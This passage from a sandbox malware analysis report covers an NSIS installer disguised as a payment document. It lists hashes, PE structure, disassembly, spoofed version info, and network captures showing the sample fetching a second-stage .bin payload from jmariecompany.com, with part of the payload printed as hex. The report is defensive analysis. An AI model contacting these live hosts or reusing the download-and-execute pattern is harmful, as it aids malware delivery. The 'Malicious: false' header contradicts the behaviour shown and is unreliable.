SHA-256: 0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512: C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious: false
Preview: NordVPN directory not found!..
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 6.875472756643268
TrID: Win32 Executable (generic) a (10002005/4) 99.96%Generic Win/DOS Executable (2004/3) 0.02%DOS Executable Generic (2002/1) 0.02%Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ref002062022pago062022.exe
File size: 275627
MD5: 7500c0e8df88d12316724078ffbeefaa
SHA1: 5e20971a917ceb5a29690584f893dc30f284956e
SHA256: a488827429040238f86305283944e1429897f94e4f629cbbbdf8d42d74af1d1a
SHA512: 576fc4e57315c610cac60d7d4c4a3b60d8048ced532bb7142c5e5a0b461a905dce374aa481b123be802a015d5f95658d8469d679c1ec94074d0e87ed00d6904c
SSDEEP: 6144:rbE/HU89oytSQlfP6YFqlMTva8/iEJcd39Y7:rbg9Z1xFqaT5/IdU
TLSH: 5744D052B700D1E7D772CB700C769FA65A69FC2386619E1723803B9F6CB3190DA2B5C5
File Content Preview:
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
Icon Hash: e0e8e8e8e0fae2e0
Entrypoint: 0x40352d
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
\Device\ConDrv
Static File Info
General
File Icon
Static PE Info
General
Copyright Joe Security LLC 2022 Page 14 of 26
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 56a78d55f3f7af51443e58e0ce2fb5f6
Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F7D8CBB9D7Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F7D8CBB9D4Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
Entrypoint Preview
Copyright Joe Security LLC 2022 Page 15 of 26
movzx ecx, cx
shl eax, 10h
or eax, ecx
Instruction
Programming Language: [EXP] VC++ 6.0 SP5 build 8804
Name Virtual Address Virtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT 0x8610 0xa0 .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE 0x59000 0x284d0 .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION 0x0 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY 0x0 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC 0x0 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG 0x0 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR 0x0 0x0
IMAGE_DIRECTORY_ENTRY_TLS 0x0 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 0x0 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_IAT 0x8000 0x2b0 .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED 0x0 0x0
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
.text 0x1000 0x6897 0x6a00 False 0.666126179245 data 6.45839821493 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata 0x8000 0x14a6 0x1600 False 0.439275568182 data 5.02410928126 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data 0xa000 0x2b018 0x600 False 0.521484375 data 4.15458210409 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata 0x36000 0x23000 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc 0x59000 0x284d0 0x28600 False 0.555334510449 data 6.08130361493 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name RVA Size Type Language Country
RT_ICON 0x59358 0x10828 dBase III DBT, version number 0, next free block index 40
English United States
RT_ICON 0x69b80 0x94a8 data English United States
RT_ICON 0x73028 0x5488 data English United States
RT_ICON 0x784b0 0x4228 dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 33, next used block 0
English United States
RT_ICON 0x7c6d8 0x25a8 dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
English United States
RT_ICON 0x7ec80 0x10a8 dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
English United States
RT_ICON 0x7fd28 0x988 data English United States
RT_ICON 0x806b0 0x468 GLS_BINARY_LSB_FIRST English United States
RT_DIALOG 0x80b18 0x100 data English United States
RT_DIALOG 0x80c18 0x11c data English United States
RT_DIALOG 0x80d38 0xc4 data English United States
Rich Headers
Data Directories
Sections
Resources
Copyright Joe Security LLC 2022 Page 16 of 26
RT_DIALOG 0x80e00 0x60 data English United States
RT_GROUP_ICON 0x80e60 0x76 data English United States
RT_VERSION 0x80ed8 0x2b4 data English United States
RT_MANIFEST 0x81190 0x33e XML 1.0 document, ASCII text, with very long lines, with no line terminators
English United States
Name RVA Size Type Language Country
DLL Import
ADVAPI32.dll RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Description Data
LegalCopyright Wyndham International Inc
FileVersion 16.9.22
CompanyName GreenPoint Financial Corp.
LegalTrademarks BorgWarner Inc.
Comments Walgreen Co
ProductName Systemax Inc.
FileDescription Fortinet Inc.
Translation 0x0409 0x04b0
Language of compilation system Country where language is spoken Map
English United States
Imports
Version Infos
Possible Origin
Network Behavior
Network Port Distribution
Copyright Joe Security LLC 2022 Page 17 of 26
Total Packets: 50
• 53 (DNS)
• 80 (HTTP)
Timestamp Source Port Dest Port Source IP Dest IP
Jun 2, 2022 16:46:17.339750051 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.522840977 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.523098946 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.523752928 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.697953939 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703290939 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703397989 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703445911 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703491926 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703519106 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703552961 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703568935 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703628063 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703632116 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703651905 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703701973 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703746080 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703756094 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703793049 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703824043 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703871965 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703882933 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703918934 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703977108 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.704030991 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.888196945 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.888259888 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.888308048 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.888354063 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.888381958 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.888425112 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.888494015 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.888556957 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889170885 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889271021 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889318943 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889369011 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889372110 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889442921 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889492989 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889511108 CEST 49746 80 192.168.11.20 139.28.232.231
TCP Packets
Copyright Joe Security LLC 2022 Page 18 of 26
Jun 2, 2022 16:46:17.889533997 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889559984 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889616966 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889652967 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889671087 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889715910 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889731884 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889792919 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889832973 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889846087 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889904022 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889908075 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889955997 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889971018 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.890027046 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.890028954 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.890080929 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.890093088 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.890182018 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.890260935 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.101731062 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.101799965 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.101846933 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.101892948 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.102013111 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.102062941 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.102076054 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103296041 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103430986 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103466034 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103528976 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103585958 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103636026 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103684902 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103745937 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103792906 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103802919 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103861094 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103900909 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103916883 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103949070 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103991985 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104007006 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104058027 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104095936 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104111910 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104166985 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104167938 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104221106 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104231119 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104269028 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104293108 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104329109 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104350090 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104401112 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104404926 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104449987 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104464054 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104497910 CEST 49746 80 192.168.11.20 139.28.232.231
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2022 Page 19 of 26
Timestamp Source Port Dest Port Source IP Dest IP
Jun 2, 2022 16:46:17.313322067 CEST 64547 53 192.168.11.20 1.1.1.1
Jun 2, 2022 16:46:17.329067945 CEST 53 64547 1.1.1.1 192.168.11.20
Jun 2, 2022 16:46:29.524741888 CEST 53471 53 192.168.11.20 1.1.1.1
Jun 2, 2022 16:46:30.537839890 CEST 53471 53 192.168.11.20 9.9.9.9
Jun 2, 2022 16:46:30.541223049 CEST 53 53471 9.9.9.9 192.168.11.20
Jun 2, 2022 16:46:30.963263988 CEST 53 53471 1.1.1.1 192.168.11.20
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Jun 2, 2022 16:46:17.313322067 CEST 192.168.11.20 1.1.1.1 0x2081 Standard query (0)
jmariecompany.com
A (IP address) IN (0x0001)
Jun 2, 2022 16:46:29.524741888 CEST 192.168.11.20 1.1.1.1 0xa522 Standard query (0)
alighierieventos.com
A (IP address) IN (0x0001)
Jun 2, 2022 16:46:30.537839890 CEST 192.168.11.20 9.9.9.9 0xa522 Standard query (0)
alighierieventos.com
A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Jun 2, 2022 16:45:40.144823074 CEST
1.1.1.1 192.168.11.20 0xa3c4 No error (0) www-bing-com.dual-a-0001.a-msedge.net
dual-a-0001.a-msedge.net
CNAME (Canonical name)
IN (0x0001)
Jun 2, 2022 16:45:40.144823074 CEST
1.1.1.1 192.168.11.20 0xa3c4 No error (0) dual-a-0001.a-msedge.net
13.107.21.200 A (IP address) IN (0x0001)
Jun 2, 2022 16:45:40.144823074 CEST
1.1.1.1 192.168.11.20 0xa3c4 No error (0) dual-a-0001.a-msedge.net
204.79.197.200 A (IP address) IN (0x0001)
Jun 2, 2022 16:45:40.294567108 CEST
1.1.1.1 192.168.11.20 0x1fe8 No error (0) devcenterapi.azure-api.net
apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net
CNAME (Canonical name)
IN (0x0001)
Jun 2, 2022 16:45:40.294567108 CEST
1.1.1.1 192.168.11.20 0x1fe8 No error (0) devcenterapi-eastus-01.regional.azure-api.net
apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net
CNAME (Canonical name)
IN (0x0001)
Jun 2, 2022 16:46:17.329067945 CEST
1.1.1.1 192.168.11.20 0x2081 No error (0) jmariecompany.com
139.28.232.231 A (IP address) IN (0x0001)
Jun 2, 2022 16:46:30.541223049 CEST
9.9.9.9 192.168.11.20 0xa522 Name error (3) alighierieventos.com
none none A (IP address) IN (0x0001)
Jun 2, 2022 16:46:30.963263988 CEST
1.1.1.1 192.168.11.20 0xa522 No error (0) alighierieventos.com
50.31.177.39 A (IP address) IN (0x0001)
jmariecompany.com
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.11.20 49746 139.28.232.231 80 C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
TimestampkBytestransferred
Direction Data
Jun 2, 2022 16:46:17.523752928 CEST
469 OUT GET /Buhari0f_XGXisVNVRE198.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: jmariecompany.comCache-Control: no-cache
UDP Packets
DNS Queries
DNS Answers
HTTP Request Dependency Graph
HTTP Packets
Copyright Joe Security LLC 2022 Page 20 of 26
Jun 2, 2022 16:46:17.703290939 CEST
471 IN HTTP/1.1 200 OKDate: Thu, 02 Jun 2022 14:46:17 GMTServer: ApacheLast-Modified: Wed, 01 Jun 2022 23:51:39 GMTAccept-Ranges: bytesContent-Length: 214592Content-Type: application/octet-streamData Raw: 5d 54 94 7f d1 ed 07 27 83 8f ba 03 ce 96 eb fc 2c b5 97 d4 5b 52 96 47 ad d8 f2 5b 13 86 92 e5 81 d8 dc a5 97 a6 59 ab f4 72 57 b3 16 77 97 0f e7 55 76 e9 b1 d8 8e d1 e6 6b f8 9e c1 36 b6 85 d9 d2 67 61 24 af 97 88 09 90 ec 70 fb ef 57 77 22 dc 0a 70 7b 78 bf dd 31 b1 7b de 9e 59 4b cc 6b 58 d4 da 19 72 30 fc fe ab 5a 6b 87 16 55 23 14 d9 7a 96 6c 2e a9 a1 2c 7c a9 2f 3c 42 3a 84 35 61 b9 80 d7 56 a1 ce 5e 5f 0a 90 cf 09 79 c5 56 bc a0 57 17 4b c4 52 84 c2 1f b4 1e 8e 89 c0 bf e8 fd 02 8c ff 06 d0 af 38 fe c5 38 0c d1 a3 ba 74 5e be bd c5 a0 3e e5 e7 4c e9 b8 a9 1e 93 51 aa 47 29 ba f2 97 06 28 91 17 4a 87 22 7f 4e a8 d9 68 49 a8 8e 11 ba 52 48 8c e7 b2 3b 2d f3 54 51 66 be f4 47 85 5e c9 b4 d2 a1 ce e3 49 36 0b 89 dd 65 55 78 4c c3 6b 82 c6 57 70 f5 b0 a9 c1 f4 45 0e c2 fb 3f 03 1d 63 74 3d 9d b5 9a 7e 56 08 26 0e 73 7f 19 fb 77 4c a5 a4 47 f0 21 78 dc b4 e0 1f 1a 07 f7 3c ae 63 e7 38 bc 04 2c 33 b9 96 7f d3 33 82 3d 36 c5 87 f0 1f 0b 06 16 48 0d 28 ae 90 ad d5 49 6c ce 07 c9 cc 74 fb 1c ec b6 89 1e a9 af d1 06 7a 86 2f 20 91 2b 77 c0 aa 81 9b 59 09 f7 98 14 57 73 6b b2 66 a3 58 77 d5 4d 84 69 59 a2 96 e7 ea eb 4e db f3 dd f1 50 20 d6 7b 95 b1 32 8b f4 5e 13 6b b8 82 fc 3c cb 2a 2f 18 92 f2 93 39 87 6a ff 0c 90 39 af 06 01 e5 b3 39 e4 3c 74 15 ad 6e b5 e3 16 f0 86 59 6d 8c 96 90 b0 cb 36 f2 02 b3 95 33 a2 e9 9c 09 9c 1d c5 67 73 13 09 14 b6 be a1 08 d1 43 9e 0f 9c 58 18 9c c9 35 81 bc d4 6a 4a 21 b5 0b 27 58 3e 7b 3c f5 30 3a 48 fd 42 97 2d 5a 4a 98 b1 86 d0 c6 78 fd 3d 9d cf ba 23 57 ad ea 5b 29 5d 9a cd b7 37 d5 c0 09 b2 2e 99 6c 96 52 1d 3e 88 94 d3 c7 33 75 70 3b c8 0e 18 87 d4 0c b3 fb ae 94 ed 00 10 21 1c 3d bc c1 07 1b e5 1f df 95 9f e6 aa c6 1f e8 3c 45 d4 1e 01 f3 03 f1 54 99 75 55 f4 57 76 ac 00 b3 71 01 3d fe 01 45 ec c5 b0 65 25 97 a7 88 f1 59 42 7b c4 b0 cf 8f bd 20 06 71 77 ac 86 37 f3 6e 79 33 17 68 82 ef fd af 9d cb e8 e4 55 2b 37 07 67 21 22 67 34 f1 b8 21 8b 4e b4 db 7f 2f 72 9d b3 49 44 a5 af e2 d3 96 3b 4f 77 b7 2b 3c fc ba 4b 0f 34 15 d7 7f 56 7b 08 18 4f e2 d8 0f c9 92 3b 53 da 99 76 67 64 09 d9 a4 ab 21 d6 f6 ff d8 30 be 4d 98 00 77 68 f6 43 91 68 50 01 60 61 39 96 ec 3f 52 ec 95 09 7a 1b 4c 26 01 49 4a 22 36 09 97 a9 ef 33 d3 ed 1e 36 72 d4 33 60 32 e5 a5 52 c2 b2 ae 94 c1 ef b4 68 57 69 79 dc 50 ad 27 29 59 fd e8 57 2e 6a b6 49 dc aa 0a 5f eb e1 8c 37 06 9b b9 f6 fa 8f 69 91 22 b3 8a 27 7f 19 b2 33 54 b9 31 46 ae fb c2 77 4077 af a0 92 6e 6c ff f3 1b 90 d6 06 5f e9 81 03 7c 98 6f 42 0e 30 ae 83 51 94 fb d5 66 a3 f7 3c d2 10 ff f1 18 8f 0e 7c 83 f6 12 a5 e6 9a 3a 25 ce 94 f3 f3 a5 b6 cd dc f0 7a 38 c0 92 d8 58 97 c9 c0 85 6b 52 23 d5 3b c8 cb 28 88 02 43 f5 af 75 69 6b 05 42 b9 9f 23 19 b7 13 db 48 35 28 8c 49 4e be db e0 15 a5 ed 96 ee 4b e9 1d 21 6a 4f ec 78 89 43 93 d6 3e 07 63 5e a0 a3 9d 35 ac c6 68 50 87 b2 a2 94 88 f3 0e 2a af 97 82 27 83 dc 72 04 3e 57 77 9a d9 0a 70 6a 6e b4 f6 6a b1 7c c9 60 58 67 ce 73 53 d4 dd 0f 8c 31 d0 fc bc 51 6b 80 0e ab 22 38 db 51 94 47 cd ab a2 04 6d a9 2f b6 6a 28 84 3b 74 29 8e d7 f1 98 01 7f cf 0b dc 02 2e 2d ad 2e d9 8b 0c 7e 24 a4 37 1b ae 13 d5 67 eb e7 a8 dd 36 9e 4b ae 9a 78 be 88 49 6e e4 50 41 a9 81 fc f8 38 f3 80 c8 ad 3e eb f4 7c eb b8 85 1e 93 01 e8 47 29 e7 e5 9f 2d 79 1d 76 3f 79 23 53 4c b0 d2 68 4e 5e 70 12 97 5b 5e 8c e7 b5 1f d0 f2 78 5b 4d bc df a4 55 5b 67 ef d3 89 da c3 49 3c 21 9a ed 67 55 50 0c c3 6b aa c6 57 61 e1 bb 82 de f4 42 19 3c fa 13 01 01 68 74 Data Ascii: ]T',[RG[YrWwUvk6ga$pWw"p{x1{YKkXr0ZkU#zl.,|/<B:5aV^_yVWKR88t^>LQG)(J"NhIRH;-TQfG^I6eUxLkWpE?ct=~V&swLG!x<c8,33=6H(Iltz/ +wYWskfXwMiYNP {2^k<*/9j99<tnYm63gsCX5jJ!'X>{<0:HB-ZJx=#W[)]7.lR>3up;!=<ETuUWvq=Ee%YB{ 